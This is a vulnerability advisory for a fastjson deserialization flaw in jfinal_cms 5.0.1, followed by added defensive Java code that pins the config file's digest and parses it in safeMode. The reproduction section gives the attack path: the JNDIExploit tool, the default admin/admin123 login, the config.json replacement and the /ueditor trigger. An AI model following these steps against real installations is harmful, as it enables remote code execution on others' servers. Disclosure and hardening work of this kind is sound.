Vulnerability summary
A command execution vulnerability exists in jfinal_cms 5.0.1.
JDK version requirements:
jfinal_cms version: 5.0.1
fastjson version: 1.2.28
Vulnerability reproduction
JDK version used in the test: JDK 8u101
Run the tool on Kali and start the RMI and LDAP services:
https://github.com/feihong-cs/JNDIExploit
Replace the RMI or LDAP address in the payload:
Create a config.json file and copy the payload into it.
Log in to the backstage management system and select template management.
Default password: admin/admin123
Click config.json.
Click Replace file.
Replace it with the config.json file containing the payload that was just created.
Visit /ueditor (in the test environment: http://localhost:8080/jfinal_cms/ueditor); the command executes and the calculator pops up.
Vulnerability analysis
com.jflyfox.component.controller.Ueditor
The ActionEnter class is instantiated in the index method of the /ueditor route.
com.baidu.ueditor.ActionEnter#ActionEnter
The ConfigManager class is instantiated in the constructor of the ActionEnter class.
com.baidu.ueditor.ConfigManager#ConfigManager
The constructor of ConfigManager calls initEnv().
com.baidu.ueditor.ConfigManager#initEnv
initEnv() calls JSONObject.parseObject to parse the file content. The file content is controllable here, so replacing the file content with the payload is enough.
com.baidu.ueditor.ConfigManager
The file comes from WEB-INF/classes/config.json. With any file upload capability in the backstage, this file can be replaced with one containing the payload, which triggers fastjson deserialization.
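The chain above ends at a single unsafe step: whatever is in WEB-INF/classes/config.json is handed straight to JSONObject.parseObject under the default parser configuration, so replacing the file replaces the parser's input. The following is an added example, not code from jfinal_cms or ueditor, of how such a loader can fail closed instead. It assumes Java 9 or later (for InputStream.readAllBytes) and fastjson 1.2.68 or later (for ParserConfig.setSafeMode, which the 1.2.28 on this page does not have); the class name SafeConfigLoader and the sample config contents are constructed for the example.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

/**
 * Added example, not jfinal_cms or ueditor code: a defensive replacement for the
 * ConfigManager#initEnv pattern that passes WEB-INF/classes/config.json straight to
 * JSONObject.parseObject. Two independent controls are applied:
 *   1. the file's SHA-256 must match a digest pinned at build time, so a replaced
 *      file is rejected before it is ever parsed;
 *   2. parsing uses a private ParserConfig in safeMode, which ignores "@type"
 *      type hints entirely (fastjson >= 1.2.68; assumption: upgraded library).
 */
public final class SafeConfigLoader {

    private final String expectedSha256;
    private final ParserConfig parserConfig;

    public SafeConfigLoader(String expectedSha256) {
        this.expectedSha256 = expectedSha256;
        // A dedicated ParserConfig: other code cannot flip the global instance back.
        this.parserConfig = new ParserConfig();
        this.parserConfig.setSafeMode(true);
    }

    /** The original, vulnerable shape: the file content alone drives deserialization. */
    static JSONObject loadUnsafe(String fileContent) {
        return JSONObject.parseObject(fileContent);
    }

    /** Hardened load: fails closed on a digest mismatch or on any type hint. */
    public JSONObject load(InputStream in) throws IOException {
        byte[] raw = in.readAllBytes();
        String actual = sha256Hex(raw);
        if (!actual.equalsIgnoreCase(expectedSha256)) {
            throw new SecurityException("config.json digest mismatch: " + actual);
        }
        String text = new String(raw, StandardCharsets.UTF_8);
        // Defense in depth for parser versions without safeMode. A substring check is
        // bypassable (e.g. a unicode-escaped key), which is why safeMode is the primary control.
        if (text.contains("@type")) {
            throw new SecurityException("config.json must be pure data, found a type hint");
        }
        return JSON.parseObject(text, JSONObject.class, parserConfig);
    }

    static String sha256Hex(byte[] data) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(data);
            StringBuilder sb = new StringBuilder(digest.length * 2);
            for (byte b : digest) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 unavailable", e);
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample config (keys modelled on ueditor's, values made up for the demo).
        byte[] good = "{\"imageActionName\":\"uploadimage\",\"imageMaxSize\":2048000}"
                .getBytes(StandardCharsets.UTF_8);
        // In a real build the digest would be pinned as a constant, not computed at runtime.
        SafeConfigLoader loader = new SafeConfigLoader(sha256Hex(good));

        JSONObject cfg = loader.load(new ByteArrayInputStream(good));
        System.out.println("loaded imageActionName=" + cfg.getString("imageActionName"));

        // A replaced file is rejected before parsing: its digest no longer matches.
        byte[] replaced = "{\"@type\":\"<placeholder>\"}".getBytes(StandardCharsets.UTF_8);
        try {
            loader.load(new ByteArrayInputStream(replaced));
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The digest check is what closes the specific hole on this page: the template-management upload can still overwrite config.json, but the overwritten file is never parsed. The safeMode parser is the general control, so that even a config the application legitimately allows administrators to edit cannot carry type hints into the deserializer.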